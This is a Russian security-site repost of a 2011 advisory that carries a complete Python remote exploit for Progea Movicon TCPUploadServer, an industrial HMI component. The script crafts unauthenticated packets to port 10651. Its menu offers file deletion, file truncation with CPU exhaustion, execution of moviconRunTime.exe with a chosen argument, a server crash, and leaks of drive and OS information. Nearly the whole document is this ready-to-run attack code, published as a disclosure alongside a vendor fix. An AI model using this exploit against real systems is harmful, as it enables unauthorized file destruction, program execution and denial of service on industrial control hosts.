Информационная безопасность
[RU] switch to English


Дополнительная информация

  Несанкционированный доступ через Progea Movicon TCPUploadServer

From:Jeremy Brown <0xjbrown41_(at)_gmail.com>
Date:23 марта 2011 г.
Subject:rogea Movicon TCPUploadServer Remote Exploit

#!/usr/bin/python
# movi.py
# Progea Movicon TCPUploadServer Remote Exploit
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# TCPUploadServer allows remote users to execute functions on the server
# without any form of authentication. Impacts include deletion of arbitrary
# files, execution of a program with an arbitrary argument, crashing the
# server, information disclosure, and more. This design flaw puts the host
# running this server at risk of potentially unauthorized functions being
# executed on the system.
#
# Tested on Progea Movicon 11 TCPUploadServer running on Windows
#
# Fix: http://support.progea.com/download/Mov11.2_Setup.zip
#

import sys
import socket

hdr="MovX"

funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and V

if len(sys.argv)<3:
    print "Progea Movicon TCPUploadServer Remote Exploit"
    print "Usage: %s <target> <function> [data]"%sys.argv[0]
    print "\nWhat would you like to do?\n"
    print "[1] Create a folder"
    print "[2] Overwrite a file with NULL and cause 100%% CPU"
    print "[3] Delete a file"
    print "[4] Execute moviconRunTime.exe with a specified argument"
    print "[5] Create a desktop shortcut"
    print "[6] Retrieve drive information"
    print "[7] Retrieve os service pack"
    print "[8] Crash the server\n"
    print "* Default data is \"test\""
    sys.exit(0)

target=sys.argv[1]
port=10651
cs=target,port

func=int(sys.argv[2])

if len(sys.argv)==4:
    data=sys.argv[3]
else:
    data="test"

if func not in funcs:
    print "Invalid function"
    sys.exit(1)

if(func==1):
    print "Crafting a packet to create the folder \"%s\"..."%data
    pkt=hdr+"1"+"B"+data+"\x00"*(66-
len(data))

elif(func==2):
    print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..."%data
    pkt=hdr+"2"+"B"+data+"\x00"*(66-
len(data))
    # O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on

elif(func==3):
    print "Crafting a packet to delete the file \"%s\"..."%data
    pkt=hdr+"3"+"B"+data+"\x00"*(66-
len(data))

elif(func==4):
    print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..."%data
    pkt=hdr+"4"+"BB"+data+"\x00"*(65-
len(data))

elif(func==5):
    print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..."%data
    pkt=hdr+"5"+"B"+data+"\x00"*(66-
len(data))

elif(func==6):
    print "Crafting a packet to retrieve drive information..."
    pkt=hdr+"6"+"\x01"

elif(func==7):
    print "Crafting a packet to retrieve os service pack..."
    pkt=hdr+"7"+"\x00"

elif(func==8):
    print "Crafting a packet to crash the server..."
    pkt=hdr+"B"+"\x00"

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(pkt)
sock.send(pkt)

print "\nPacket sent!"

if((func==6)|(func==7)):
    info=sock.recv(128)
    
    if(info):
         print "\nRetrieved info:\n"
         if(func==6):
              print "%s"%info[6:]
         elif(func==7):
              print "%s"%info[22:]
    else:
         print "\nNo info"

sock.close()

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород